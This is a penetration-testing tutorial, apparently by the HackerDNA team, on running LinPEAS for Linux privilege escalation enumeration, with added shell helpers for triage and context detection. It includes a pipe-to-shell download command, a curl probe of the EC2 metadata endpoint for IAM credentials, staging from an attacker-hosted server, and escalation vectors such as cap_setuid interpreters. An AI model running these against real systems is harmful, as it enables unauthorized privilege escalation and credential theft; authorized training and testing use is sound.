How to Use LinPEAS: Linux Privilege Escalation Guide

Tutorial
13 min read

LinPEAS is the enumeration script that turns the first thirty minutes after a low-privilege Linux shell into ten. You drop the script onto the box, run it, watch the output paint the terminal in red and yellow, and start working through the highest-priority findings before the script finishes. This guide covers how to use LinPEAS end to end: installation, the flags that actually matter, reading the color-coded output, the privilege escalation vectors LinPEAS surfaces best, and where it fits next to its sibling WinPEAS. Practice each technique hands-on in HackerDNA's Linux Privilege Escalation course, starting with the Cronpocalypse lab as you read.

Every example below targets the current LinPEAS release in the PEASS-ng project, which ships as a single shell script with no dependencies. It is written for POSIX sh rather than bash, and that portability is the entire point: LinPEAS runs on any system with /bin/sh, including hardened containers, BusyBox shells, and the stripped-down embedded Linux that ships inside internal appliances. If the target has curl or wget and an outbound network path, you can have LinPEAS started in seconds; the run itself takes a few minutes.

TL;DR: LinPEAS is a shell enumeration script that scans a Linux host for privilege escalation paths and ranks findings by exploitability using color codes. Drop it on a target with curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh, then triage the red-on-yellow lines first - those are the 95% confidence wins (writable /etc/passwd, NOPASSWD sudo, exploitable SUID binaries, kernel CVEs with public exploits). Pair it with WinPEAS on the Windows side and you have the standard PEASS workflow most pentesters and OSCP candidates run on every box.

What Is LinPEAS?

LinPEAS is a Linux Privilege Escalation Awesome Script that automates post-exploitation enumeration on Linux hosts. It runs through hundreds of system checks, then prints findings color-coded by likelihood of being exploitable, so the operator can ignore the noise and focus on the wins.

The script lives inside the broader PEASS-ng project, maintained by Carlos Polop and a long list of contributors at github.com/peass-ng/PEASS-ng. PEASS-ng (Privilege Escalation Awesome Scripts Suite, Next Generation) is the current home of the original PEASS project rather than a separate fork: the repository was renamed and later moved from Carlos Polop's personal account into the peass-ng organization. It holds LinPEAS for Linux, WinPEAS for Windows, and the macOS checks that LinPEAS runs as MacPEAS. The "ng" matters: the legacy carlospolop/privilege-escalation-awesome-scripts-suite repo still ranks highly in search, but active development happens in the PEASS-ng organization.

LinPEAS is the post-exploitation cousin of LinEnum, but it does more, prints more, and prioritizes more aggressively. LinEnum is a useful first read; LinPEAS is what you run when you need a ranked answer in one shot. For OSCP candidates, the practical reality is that enumeration scripts like LinPEAS are permitted in the exam, and almost everyone runs it as the first step on every Linux machine.

One opinionated take before going further: the loudest critique of LinPEAS is that it is "too noisy." That is true and irrelevant. The script is built so that you ignore the green and pink, scroll to the red-on-yellow, and save the full output to a file for review later. Treating LinPEAS output like a normal terminal log is what makes it feel overwhelming. Treat it like a search result page where you only read the top five hits, and the noise stops mattering.

How LinPEAS Works

LinPEAS is a single shell script. When you run it, it executes a long sequence of find, ls, cat, ps, ss, and grep commands against well-known privilege escalation surfaces - filesystem permissions, SUID and SGID binaries, sudo configuration, scheduled tasks, capabilities, kernel version, services exposing local ports, recent files, container indicators, cloud metadata endpoints, and several dozen others.

Two design choices matter. First, LinPEAS is read-only. It does not modify files or install packages, and it makes no outbound connections beyond its own detection probes (the cloud metadata endpoints, and the linux-exploit-suggester database fetch that only happens under -a). Second, the output is layered. Each finding is tagged with a severity color, and the legend printed at the top of every run explains the tiers, so the highest-severity items can be picked out before the script has finished.

The script also detects its own context. If you run LinPEAS inside a Docker container, it flags container escape paths: a mounted Docker socket, dangerous capabilities such as CAP_SYS_ADMIN, and host filesystem mounts under /host/. On an EC2 instance it queries the metadata service for IAM credentials. Inside a Kubernetes pod it checks the service account token. Context-aware enumeration matters because the privesc surface is wildly different across these environments.
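Added example, not LinPEAS's own code: the filesystem probes behind the container, Kubernetes and capability verdicts described above, collected into one function. It takes a root prefix so it can be exercised against a constructed directory tree; on a live target you call it on /. The EC2 metadata probe is a separate function because it goes over the network, and the CapEff value in the constructed tree is arbitrary.

```shell
#!/bin/sh
# Added example (not from PEASS-ng): the handful of context probes behind the
# "am I in a container / pod?" verdicts. detect_context takes a root prefix so
# it can be pointed at a test tree; on a live box call it with "/" or no argument.

detect_context() {
  root=${1:-/}
  root=${root%/}            # strip a trailing slash so "$root/etc" never doubles up

  # Docker drops this marker file; cgroup v1 paths name the runtime outright.
  if [ -f "$root/.dockerenv" ]; then
    echo "container: /.dockerenv present (Docker)"
  elif [ -r "$root/proc/1/cgroup" ] && grep -qE 'docker|kubepods|containerd|lxc' "$root/proc/1/cgroup"; then
    echo "container: runtime named in /proc/1/cgroup"
  fi

  # A mounted Docker socket is the classic escape: whoever can talk to it can
  # start a privileged container with the host filesystem mounted.
  for sock in "$root/var/run/docker.sock" "$root/run/docker.sock"; do
    if [ -S "$sock" ]; then
      [ -w "$sock" ] && acc=writable || acc=read-only
      echo "escape: docker socket at ${sock#"$root"} ($acc)"
    fi
  done

  # Kubernetes mounts the service-account token here unless automount is off.
  tok="$root/var/run/secrets/kubernetes.io/serviceaccount/token"
  [ -r "$tok" ] && echo "k8s: service account token readable at ${tok#"$root"}"

  # A host filesystem bind-mounted inside the container is an escape in itself.
  if [ -r "$root/proc/mounts" ] && grep -qE ' /host[/ ]' "$root/proc/mounts"; then
    echo "escape: host filesystem mounted under /host"
  fi

  # Effective capability mask; feed the hex value to `capsh --decode=` to read it.
  if [ -r "$root/proc/self/status" ]; then
    caps=$(awk '/^CapEff:/ { print $2 }' "$root/proc/self/status")
    [ -n "$caps" ] && echo "caps: CapEff=$caps"
  fi
}

# Cloud metadata is a network probe, not a file, so it is separate and only runs
# when asked. IMDSv1 answers this GET directly; IMDSv2 requires a token first.
probe_ec2_metadata() {
  command -v curl >/dev/null 2>&1 || return 1
  curl -s --connect-timeout 2 http://169.254.169.254/latest/meta-data/iam/security-credentials/
}

# Constructed test tree (not a real container) so the probes can be exercised anywhere.
build_fake_container() {
  root=$1
  mkdir -p "$root/proc/1" "$root/proc/self" "$root/var/run/secrets/kubernetes.io/serviceaccount"
  : > "$root/.dockerenv"
  echo '0::/kubepods/burstable/pod1234/abcd' > "$root/proc/1/cgroup"
  printf 'CapEff:\t000001ffffffffff\n' > "$root/proc/self/status"   # arbitrary value
  echo 'constructed-jwt' > "$root/var/run/secrets/kubernetes.io/serviceaccount/token"
}

# Demo on a fake tree; on a real target just run: detect_context /
DEMO=$(mktemp -d)
build_fake_container "$DEMO"
detect_context "$DEMO"
rm -rf "$DEMO"
```

The socket and /host checks only fire against real mounts, so the fake tree exercises the marker-file, token and capability paths; point the function at / inside a real container to see the rest.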

💻 Practice this now: Cronpocalypse lab - run LinPEAS against a real misconfigured cron environment in your browser, no setup required.

How to Install LinPEAS

There are three install paths and the right one depends on whether you have outbound network on the target, write access to disk, and a working curl or wget. All three pull from the same upstream release.

Method 1: Direct Download (Most Common)

If the target has outbound network and writable space (/tmp almost always works), pull the latest release directly:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh -o /tmp/linpeas.sh
chmod +x /tmp/linpeas.sh
/tmp/linpeas.sh

Use wget if curl is missing: wget -O /tmp/linpeas.sh https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh. Both are commonly present, but stripped containers sometimes have neither - in which case fall back to method 3.

Method 2: Pipe to Shell (No Disk Write)

When you cannot or do not want to drop a file on disk (file integrity monitoring, read-only filesystem, EDR watching /tmp), pipe the download straight into the shell:

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh

This loses the ability to pass flags directly, so wrap it: curl -L .../linpeas.sh | sh -s -- -a. The -s -- tells sh to read from stdin and pass the rest of the line as arguments to the script.

Method 3: Kali peass-ng Package

Recent Kali Linux releases ship the PEASS-ng suite as a package:

sudo apt install peass-ng
linpeas

This one is for your attacker box, not the target: the package gives you a local copy of the scripts to serve to hosts that cannot reach GitHub. The target itself will almost never have it installed.

Either way, verify the script before running it on a customer system. Page through it with less /tmp/linpeas.sh and compare its SHA256 with the hash on the GitHub release page; PEASS-ng publishes SHA256 hashes alongside the release assets, and comparing them takes ten seconds and rules out a tampered copy.
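A staging helper for the install procedure above, written for this guide rather than taken from PEASS-ng. It fetches the script from an HTTP server you run on your own box (the IP, port and digest in the example invocation are placeholders), refuses to run it unless its SHA256 matches the value you recorded, and falls back from curl to wget. Everything from the verify step onwards works offline.

```shell
#!/bin/sh
# Added example (not part of PEASS-ng): stage linpeas.sh on a target that has no
# route to GitHub, then refuse to run it unless its SHA-256 matches the copy you
# checked on your own box. Paths, the attacker IP and the digest are placeholders.
#
# On the attacker box, after downloading the release and recording its hash:
#   sha256sum linpeas.sh            # note the hex digest
#   python3 -m http.server 8000     # serve it over HTTP to the target

# fetch URL DEST: curl first, wget second; non-zero if the box has neither.
fetch() {
  url=$1; dest=$2
  if command -v curl >/dev/null 2>&1; then
    curl -fsSL "$url" -o "$dest"
  elif command -v wget >/dev/null 2>&1; then
    wget -qO "$dest" "$url"
  else
    echo "no curl or wget on target; fall back to scp or a base64 paste" >&2
    return 1
  fi
}

# sha256_of FILE: compute the digest with whatever tool the box has
# (coreutils sha256sum, perl shasum, or openssl).
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  elif command -v shasum >/dev/null 2>&1; then
    shasum -a 256 "$1" | cut -d' ' -f1
  else
    openssl dgst -sha256 "$1" | sed 's/.*= //'
  fi
}

# verify_sha256 FILE EXPECTED_HEX: 0 if the digest matches, 1 otherwise.
# Case-insensitive so a hash pasted from a release page works as-is.
verify_sha256() {
  actual=$(sha256_of "$1" | tr 'A-Z' 'a-z')
  expected=$(printf '%s' "$2" | tr 'A-Z' 'a-z')
  if [ -n "$actual" ] && [ "$actual" = "$expected" ]; then
    return 0
  fi
  return 1
}

# stage_and_run URL DEST EXPECTED_HEX [linpeas args...]
# Downloads, verifies, and only then executes; a mismatch deletes the file.
stage_and_run() {
  url=$1; dest=$2; expected=$3; shift 3
  fetch "$url" "$dest" || return 1
  if verify_sha256 "$dest" "$expected"; then
    chmod +x "$dest"
    "$dest" "$@"
  else
    echo "hash mismatch on $dest: not running it" >&2
    rm -f "$dest"
    return 1
  fi
}

# Example invocation (placeholder IP, port and digest; take them from your notes):
#   EXPECTED=5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03
#   stage_and_run http://10.10.14.5:8000/linpeas.sh /tmp/linpeas.sh "$EXPECTED" -q | tee /tmp/linpeas.out
```

Hard-code the expected digest into the command you type on the target rather than fetching a checksum file from the same server; if the server is yours that is fine, but the point of the check is that the digest comes from a source you trust independently of the download.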

Running LinPEAS: Flags That Actually Matter

The -h output lists about twenty flags. In practice, four of them cover 95% of real use:

  • -a - all checks. Adds the slow checks (the linux-exploit-suggester pass, deep file searches, and brute-forcing other local users over su when you also supply a password with -P). Use this for the OSCP-style "leave it running while I drink coffee" pass.
  • -s - stealth and superfast mode. Skips checks that touch noisy areas (recent file discovery, large filesystem walks). Use this when EDR is in scope.
  • -q - quiet. Suppresses the banner so the output is cleaner for piping into a file.
  • -o <sections> - run only the named check categories (for example SysI,Container,Net in older releases; run -h to see the exact section names for your copy, since they have changed between versions). Useful when you already know what you are hunting for.

An honest opinionated note: skip -a on the first run. The default invocation finds 90% of wins faster, and you can always rerun with -a if nothing immediate falls out. The -a flag adds roughly a minute of extra checks for findings that are usually duplicates of what the default scan already surfaces.

Save output to a file for review and reporting:

/tmp/linpeas.sh -q | tee /tmp/linpeas.out

The tee approach lets you watch output live and keep a clean copy. LinPEAS writes ANSI color codes by default (pass -N to disable them), so the saved file keeps its colors; read it back in an ANSI-aware viewer with less -R /tmp/linpeas.out.

Reading LinPEAS Output: Color Codes and Priority

LinPEAS output looks like a wall of text on first read. It is not. The colors encode a priority system, and once you read the legend the output becomes scannable.

  • Red text on yellow background - 95%+ confidence privilege escalation. Read these first. Every. Single. Time.
  • Red text on no background - finding worth investigating. Probably a privesc vector, but needs context (a writable script that root never executes is not a win).
  • Yellow text - "you should probably know about this." Often configuration that matters but is not directly exploitable.
  • Green - common things (users, groups, installed software) and values reported for context. Skip on first read.
  • Light cyan, light magenta and blue - users with a console shell, your own username, and users without a console plus mounted devices respectively. Useful for lateral movement targeting, not for privilege escalation directly.

The "Interesting Files" and "Software Information" sections are usually the longest and produce the most green/cyan noise. If you are reading from a saved file, jump straight to the section headers that matter, for example "SUID - Check easy privesc, exploits and write perms", which is where the red-on-yellow lines tend to cluster. When triage time is tight, grep the colored output for the escape sequence LinPEAS uses for red-on-yellow and read only those lines:

grep -aE $'\033\\[1;31;103m' /tmp/linpeas.out | head -20

That pattern matches the ANSI sequence for "red text on yellow background" (ESC[1;31;103m) and pulls out only the lines LinPEAS itself flagged as 95%+ confidence. The $'...' quoting is a bash feature; in plain sh build the pattern with printf '\033' instead. In practice this is the single command that matters most when time is short.
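An added triage helper (not part of LinPEAS) that does the grep above properly: it pulls the red-on-yellow lines, strips the ANSI sequences so they paste cleanly into a report, lists the second-tier red lines, and counts both tiers. The sample run at the bottom is constructed to mimic LinPEAS's tagging style and is not a real capture.

```shell
#!/bin/sh
# Added example (not from PEASS-ng): pull the priority lines out of a saved run
# and make a colour-free copy for the report. The escape sequences are the ones
# linpeas emits: red on yellow is ESC[1;31;103m, plain red is ESC[1;31m.

ESC=$(printf '\033')
RED_YELLOW="${ESC}\[1;31;103m"     # 95%+ PE vector
RED="${ESC}\[1;31m"                # "take a look at it"

# Remove every SGR colour sequence (ESC [ digits ; digits m) so the text is
# greppable and safe to paste into a report appendix.
strip_ansi() {
  sed "s/${ESC}\[[0-9;]*m//g"
}

# Highest-priority lines only; reads file arguments or stdin.
peas_hits() {
  grep -a -e "$RED_YELLOW" "$@" | strip_ansi
}

# Second tier: plain red lines that need context before they count as a win.
peas_followups() {
  grep -a -e "$RED" "$@" | strip_ansi
}

# Count by tier so you know how deep the triage goes before you start reading.
# Input is buffered once because stdin can only be consumed a single time.
peas_summary() {
  data=$(cat "$@")
  printf '%s red-on-yellow, %s red\n' \
    "$(printf '%s\n' "$data" | grep -ac -e "$RED_YELLOW")" \
    "$(printf '%s\n' "$data" | grep -ac -e "$RED")"
}

# Constructed sample in linpeas's tagging style (a match wrapped in the colour
# sequence and reset with ESC[0m). The contents are made up for the demo.
sample_run() {
  printf '%s[1;31;103m-rwsr-xr-x 1 root root /usr/bin/find%s[0m\n' "$ESC" "$ESC"
  printf '%s[1;32m-rwsr-xr-x 1 root root /usr/bin/passwd%s[0m\n' "$ESC" "$ESC"
  printf 'User www-data may run the following commands on web01:\n'
  printf '    (root) NOPASSWD: %s[1;31;103m/usr/bin/vim%s[0m\n' "$ESC" "$ESC"
  printf '%s[1;31m/etc/cron.d/backup references /opt/backup.sh%s[0m\n' "$ESC" "$ESC"
  printf '%s[1;34m[+] Linux version 5.15.0-91-generic%s[0m\n' "$ESC" "$ESC"
}

# On a real engagement: peas_summary /tmp/linpeas.out; peas_hits /tmp/linpeas.out
sample_run | peas_summary
sample_run | peas_hits
```

Keep the raw colored file as the evidence copy and generate the stripped version for the appendix; stripping in place throws away the prioritisation you will want when you revisit the box later.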

Top Privilege Escalation Vectors LinPEAS Surfaces

Six categories produce the overwhelming majority of LinPEAS wins on real engagements. Knowing what each looks like in the output speeds up triage.

Sudo NOPASSWD and Sudo Misconfigurations

LinPEAS runs sudo -l as part of its user checks (supplying the current user's password with -P if you have it). Look for NOPASSWD entries, rules that allow specific binaries (especially anything with a GTFOBins entry), and env_keep directives that preserve LD_PRELOAD or LD_LIBRARY_PATH. Each of those has a documented escalation pattern.

SUID and SGID Binaries

LinPEAS lists every SUID-root binary on the system and cross-references against GTFOBins entries. Anything matching gets flagged in red. Common live wins: /usr/bin/find with the SUID bit, nmap in interactive mode on legacy boxes, custom binaries with the SUID bit set by accident. Practice spotting and exploiting these in HackerDNA's SUID Privilege Hunter lab.

Cron Jobs and Systemd Timers

Cron entries that run as root and reference writable scripts or wildcard expansions are escalation gold. LinPEAS prints /etc/crontab, the per-user crontabs it can read, the /etc/cron.d/ entries, and the systemd timer list. Check the Matsudo lab for hands-on cron-based escalation practice.

Kernel Version and Public Exploits

With -a, LinPEAS pulls the linux-exploit-suggester database and prints likely kernel exploits for the running version. Useful as a hint, but verify the actual patch level (uname -r tells you the version, not what is patched). Many distros backport security fixes without bumping the version string.

Capabilities

Linux capabilities are a more granular alternative to SUID. A binary with cap_setuid+ep can become root without ever being SUID-root. LinPEAS runs getcap -r / and flags interesting capabilities. The most exploitable one is cap_setuid+ep on Python, Perl, or any scripting interpreter - one line of code becomes a root shell.

Writable Files in Privileged Paths

World-writable files in /etc/, /usr/local/bin/, or any path that root processes execute from are an immediate win. LinPEAS lists these with the world-writable bit highlighted. The MITRE ATT&CK reference for these patterns is the Privilege Escalation tactic (TA0004), which catalogs the broader technique families LinPEAS detects.
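The manual confirmation step for three of the vectors above, as an added example rather than anything LinPEAS ships: parse a crontab for root jobs whose script you can write to, list the NOPASSWD rules from sudo -l one binary per line so each can be looked up in GTFOBins, and tag the dangerous capability sets in getcap output. The functions read from stdin so they work on a saved capture or a live pipe; the sample inputs at the bottom are constructed, not captured.

```shell
#!/bin/sh
# Added example (not from PEASS-ng): re-check three kinds of LinPEAS finding by
# hand before committing to an exploit path. Each function reads the raw text of
# the command named in its comment from stdin.

# 1. Root cron jobs whose target script you can modify. Input is /etc/crontab or
#    /etc/cron.d/* format (five time fields or @reboot, then USER, then command).
#    Prints "WRITABLE|DIR-WRITABLE|MISSING|ok <path>". Run it as the low-privilege
#    user: as root everything is writable and the verdict means nothing.
cron_root_targets() {
  awk '/^[[:space:]]*#/ || /^[[:space:]]*$/ || /^[A-Za-z_][A-Za-z0-9_]*=/ { next }
       { u = ($1 ~ /^@/) ? 2 : 6 }
       $u == "root" { for (i = u + 1; i <= NF; i++) if ($i ~ /^\//) { print $i; break } }' |
  while IFS= read -r path; do
    if [ -w "$path" ]; then state=WRITABLE                       # edit the script root runs
    elif [ -e "$path" ]; then state=ok
    elif [ -w "$(dirname "$path")" ]; then state=DIR-WRITABLE    # create the missing file yourself
    else state=MISSING
    fi
    printf '%s %s\n' "$state" "$path"
  done
}

# 2. NOPASSWD rules from `sudo -l`, printed as "<runas> <command>", one command
#    per line, so each binary can be checked against GTFOBins.
sudo_nopasswd() {
  grep -aE 'NOPASSWD:' |
  sed -e 's/^[[:space:]]*//' -e 's/[[:space:]]*NOPASSWD:[[:space:]]*/|/' |
  awk -F'|' '{ n = split($2, cmds, /,[ \t]*/); for (i = 1; i <= n; i++) print $1, cmds[i] }'
}

# 3. Capability hits from `getcap -r / 2>/dev/null`. Both output styles
#    ("file = cap_setuid+ep" and "file cap_setuid=ep") contain the capability
#    name, so a plain match covers them. Interpreters are tagged because one
#    line of code in them finishes the job.
cap_hits() {
  grep -aE 'cap_(setuid|setgid|dac_override|dac_read_search|sys_admin|sys_ptrace|sys_module)' |
  awk '{ tag = ($1 ~ /python|perl|ruby|php|node|lua/) ? "INTERPRETER" : "binary"; print tag, $0 }'
}

# Constructed samples (not captures). sample_crontab writes a script we own into
# DIR so the WRITABLE verdict can be demonstrated on any box.
sample_crontab() {
  dir=$1
  printf '#!/bin/sh\necho backup\n' > "$dir/backup.sh"
  cat <<EOF
# /etc/crontab: system-wide crontab (constructed)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

*/5 *  * * * root    $dir/backup.sh
@reboot      root    /nonexistent-dir-9f3a/firstboot.sh
0 3  * * *   www-data /var/www/rotate-logs.sh
EOF
}

sample_sudo_l() {
  cat <<'EOF'
Matching Defaults entries for www-data on web01:
    env_reset, mail_badpass, env_keep+=LD_PRELOAD

User www-data may run the following commands on web01:
    (root) NOPASSWD: /usr/bin/vim, /usr/bin/find
    (root) /usr/sbin/service apache2 restart
EOF
}

sample_getcap() {
  cat <<'EOF'
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/lib/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/local/bin/backupd = cap_dac_read_search+ep
EOF
}

# Demo run. On a live target: cat /etc/crontab /etc/cron.d/* | cron_root_targets,
# sudo -l | sudo_nopasswd, getcap -r / 2>/dev/null | cap_hits
DEMO=$(mktemp -d)
sample_crontab "$DEMO" | cron_root_targets
sample_sudo_l | sudo_nopasswd
sample_getcap | cap_hits
rm -rf "$DEMO"
```

The cron check is the one LinPEAS cannot finish for you: it can show that a root job references a path, but whether that path (or its parent directory) is writable by the user you actually have is what decides the win, and a quick test -w from that user's shell settles it.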

LinPEAS vs WinPEAS: When to Use Which

Same project, different operating systems. LinPEAS is the Linux variant; WinPEAS is the Windows variant, distributed as a precompiled .exe (and a .bat alternative). They share the design philosophy - color-coded enumeration, ranked findings, single-binary deployment - and they share the maintainer (PEASS-ng).

The decision is operating system, not preference. If your target box returns uname -a, run LinPEAS. If systeminfo works, run WinPEAS. The two scripts overlap on portable concepts (process enumeration, scheduled tasks, network listeners) but diverge on platform specifics (Linux capabilities vs Windows token privileges, sudo vs UAC, cron vs scheduled tasks). Practice the Windows side in HackerDNA's Windows Privilege Escalation course - the workflow is parallel but the vectors are different enough that learning one does not give you the other for free.

For the broader question of how PEASS fits next to other tools (LinEnum, pspy, linuxprivchecker), our penetration testing tools roundup walks through the full enumeration toolkit and where each script wins.

Practice Linux Privilege Escalation Hands-On

LinPEAS findings only matter if you can act on them. Reading the output is the first half; chaining a finding into a root shell is the second. The fastest way to build that reflex is to practice on intentionally-vulnerable Linux boxes that mirror real engagement scenarios. HackerDNA's privilege escalation labs run in the browser with no setup, no VPN, and no Docker install. Sign up for the free tier, drop into the Cronpocalypse lab, and run LinPEAS as your first move. Compare what LinPEAS flags against what is actually exploitable. Repeat across the SUID Privilege Hunter and Matsudo labs and you have the muscle memory most OSCP candidates need before exam day.

For the deeper conceptual ground - why each privilege escalation vector exists, how Linux permissions actually work, and what a defender would look for - the Linux Privilege Escalation course covers the full theoretical foundation alongside the labs. The course and labs are linked: every concept in the course has a hands-on exercise.

Legal and Ethical Considerations

Critical reminder: Always get explicit written authorization before running LinPEAS or any privilege escalation tooling against a system. Even though LinPEAS is read-only, running it against a system you do not own is unauthorized access under the Computer Fraud and Abuse Act (US), the Computer Misuse Act (UK), and equivalent laws in most jurisdictions.

  • Use LinPEAS only on systems you own, lab environments, or systems explicitly in scope for an authorized engagement.
  • Document every command run during a customer engagement. LinPEAS output should go in the report appendix.
  • Pull LinPEAS only from the official PEASS-ng GitHub releases. A random mirror or fork is an easy place for someone to slip in changes you did not ask for.
  • Confirm the SHA256 of the script against the upstream release before running on a production system. Five seconds of paranoia is worth it.

Frequently Asked Questions

Is LinPEAS safe to run on a production system?

LinPEAS is read-only and does not modify files or open inbound connections, so it is safe in the technical sense. Two risks remain. The first is detection: enumeration scripts trip behavioural EDR by running hundreds of find and ls commands in quick succession, so on systems with EDR or sysdig watching, expect the run to generate alerts, and use -s stealth mode if the engagement requires reduced noise. The second is load: the filesystem walks behind the find checks can push I/O on a busy server, so agree a window with the system owner before running it on production.

What do the LinPEAS color codes mean?

Red text on a yellow background is the highest priority - 95% confidence the finding is exploitable. Plain red is a probable privesc vector that needs context. Yellow is configuration worth knowing about. Light blue and green are informational; skip them on first read. The legend is printed at the top of every LinPEAS run.

LinPEAS or LinEnum: which should I run first?

LinPEAS. LinEnum is older, less maintained, and produces flatter output without LinPEAS's prioritization. Run LinEnum only if LinPEAS does not run on the target (extremely rare - LinPEAS is plain POSIX sh and runs almost everywhere). Most pentesters carry both as backups; in 2026, LinEnum exists mainly as a historical reference.

Can I run LinPEAS without internet access on the target?

Yes. The script is self-contained POSIX sh. Some checks (the linux-exploit-suggester database fetch under -a) require outbound network, but the core enumeration runs fully offline. Drop the script on the box via SCP, an SMB share, or an existing file upload primitive, and run it as normal.

Where can I practice LinPEAS legally?

HackerDNA's privilege escalation labs are the fastest start: browser-based, no setup, intentionally vulnerable Linux boxes that respond to LinPEAS findings as you would expect on real engagements. Beyond HackerDNA, the OverTheWire Bandit wargame and any local Vulnhub box you import into VirtualBox are good practice grounds.

Your Next Steps

LinPEAS is the one script that pays for itself within the first run on any Linux engagement. Install it, learn to read the colors, and triage the red-on-yellow findings before anything else. The tool is simple; the privesc patterns it surfaces are the work. Start with HackerDNA's free tier, no credit card required, and run LinPEAS on a real misconfigured target in the Cronpocalypse lab. Then work through the Linux Privilege Escalation course to understand why each finding matters. Pentesting reflexes are built by repetition, and LinPEAS is the script you will run on every Linux box for the rest of your career.

HackerDNA Team


Written by the HackerDNA team - cybersecurity professionals building hands-on hacking labs and educational content to help you develop real-world security skills.
